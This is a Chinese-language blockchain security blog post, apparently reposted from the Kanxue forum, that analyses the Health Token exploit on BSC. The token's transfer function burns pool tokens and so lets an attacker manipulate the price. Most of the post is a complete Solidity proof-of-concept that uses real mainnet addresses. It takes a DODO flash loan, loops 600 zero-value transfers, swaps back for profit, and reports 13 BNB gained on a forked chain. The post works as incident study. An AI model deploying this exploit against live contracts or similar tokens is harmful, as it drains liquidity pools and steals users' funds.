区块链安全学习 – Health Token

区块链安全 2年前 (2022) admin
400 0 0

区块链安全学习 - Health Token

本文为看雪论坛优秀文章

看雪论坛作者ID:Catsay


攻击交易https://phalcon.blocksec.com/tx/bsc/0xae8ca9dc8258ae32899fe641985739c3fa53ab1f603973ac74b424e165c66ccf

攻击分析

攻击者通过dodo闪电贷获取了40个WBNB,通过pancakeSwap的Router兑换了30565652268756555675523626个。
区块链安全学习 - Health Token
相同数目的Health token应该只能swap出个40000000000000000000
但是却兑换出了56641927146106351887,归还闪电贷后,至此黑客获利16641927146106351887。也就是16BNB。
通过观察交易,发现黑客发送了大量的 transfer,去看合约代码。
发现在 transfer 函数中,如果满足了条件,它就会销毁流动池中的Health代币。从而导致Health兑换WBNB的价格增高。
区块链安全学习 - Health Token

复盘

我们同样也去dodo借一笔闪电贷,然后去模拟运行一下。fork bsc 22337426区块。
去tenderly模拟,因为循环次数过多,我们需要拉高gas:
区块链安全学习 - Health Token
pragma solidity ^0.8.0;interface IERC20 {     event Transfer(address indexed from, address indexed to, uint256 value);     event Approval(address indexed owner, address indexed spender, uint256 value);     function totalSupply() external view returns (uint256);     function balanceOf(address account) external view returns (uint256);     function transfer(address to, uint256 amount) external returns (bool);     function allowance(address owner, address spender) external view returns (uint256);     function approve(address spender, uint256 amount) external returns (bool);     function transferFrom(        address from,        address to,        uint256 amount    ) external returns (bool);} interface Uni_Router_V2 {    function swapExactTokensForTokensSupportingFeeOnTransferTokens(        uint256 amountIn,        uint256 amountOutMin,        address[] memory path,        address to,        uint256 deadline  ) external;}  interface IDPPAdvanced {    function flashLoan(        uint256 baseAmount,        uint256 quoteAmount,        address assetTo,        bytes calldata data    ) external;} interface IWBNB {    function balanceOf(address account) external view  returns (uint256);    function withdraw(uint wad) external;    function deposit() external payable;    function approve(address guy, uint wad) external returns (bool);} interface IPancakeRouter {    function getAmountsIn(uint amountOut, address[] memory path) external view returns (uint[] memory amounts);    function swapExactTokensForTokens(        uint amountIn,        uint amountOutMin,        address[] calldata path,        address to,        uint deadline    ) external returns (uint[] memory amounts);    function swapExactTokensForTokensSupportingFeeOnTransferTokens(        uint amountIn,        uint amountOutMin,        address[] calldata path,        address to,        uint deadline    ) external;} interface IHealth {    function balanceOf(address account) external view  returns (uint256);    function approve(address spender, uint256 amount) external returns (bool);    function transfer(address recipient, uint256 amount) external returns (bool);} interface IPancakePair {    function skim(address to) external;    function sync() external;} struct DPPAdvancedCallBackData {    uint256 baseAmount;    uint256 quoteAmount;}     contract ContractTest{    IERC20 HEALTH = IERC20(0x32B166e082993Af6598a89397E82e123ca44e74E);    IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);    Uni_Router_V2 uni_pair = Uni_Router_V2(0xF375709DbdE84D800642168c2e8bA751368e8D32);    Uni_Router_V2 uni_router = Uni_Router_V2(0x10ED43C718714eb63d5aA57B78B54704E256024E);    address public constant dodo = 0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4;     function testExp() external{         WBNB.approve(address(uni_router), type(uint).max);        HEALTH.approve(address(uni_router),type(uint).max);         uint256 borrown_wbnb_amt = 200 * 1e18;        DPPAdvancedCallBackData memory callbackData;        callbackData.baseAmount = borrown_wbnb_amt;        callbackData.quoteAmount = 0;        bytes memory data = abi.encode(callbackData);         IDPPAdvanced(dodo).flashLoan(borrown_wbnb_amt,0,address(this),data);     }     fallback() external payable {    }     function DPPFlashLoanCall(        address sender,        uint256 baseAmount,        uint256 quoteAmount,        bytes calldata data    ) external {        WBNBToHEALTH();        for(uint i = 0; i < 600; i++){            HEALTH.transfer(address(this), 0);        }        HEALTHToWBNB();        WBNB.transfer(dodo, 200 * 1e18);    }      function WBNBToHEALTH() internal{        address[] memory path = new address[](2);        path[0] = address(WBNB);        path[1] = address(HEALTH);        uni_router.swapExactTokensForTokensSupportingFeeOnTransferTokens(            WBNB.balanceOf(address(this)),            0,            path,            address(this),            block.timestamp        );    }     function HEALTHToWBNB() internal{        address[] memory path = new address[](2);        path[0] = address(HEALTH);        path[1] = address(WBNB);        uni_router.swapExactTokensForTokensSupportingFeeOnTransferTokens(            HEALTH.balanceOf(address(this)),            0,            path,            address(this),            block.timestamp        );    }

区块链安全学习 - Health Token成功获利13个BNB。



区块链安全学习 - Health Token


看雪ID:Catsay

https://bbs.pediy.com/user-home-642281.htm

*本文由看雪论坛 Catsay 原创,转载请注明来自看雪社区

区块链安全学习 - Health Token

# 往期推荐

1、frida入门

2、2022祥云杯CTF babyparser

3、Android 内存执行ELF研究

4、有风控&无风控App对抗深入浅出

5、逆向记录


区块链安全学习 - Health Token


区块链安全学习 - Health Token

球分享

区块链安全学习 - Health Token

球点赞

区块链安全学习 - Health Token

球在看


区块链安全学习 - Health Token

点击“阅读原文”,了解更多!

原文始发于微信公众号(看雪学苑):区块链安全学习 – Health Token

版权声明:admin 发表于 2022年12月17日 下午6:00。
转载请注明:区块链安全学习 – Health Token | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...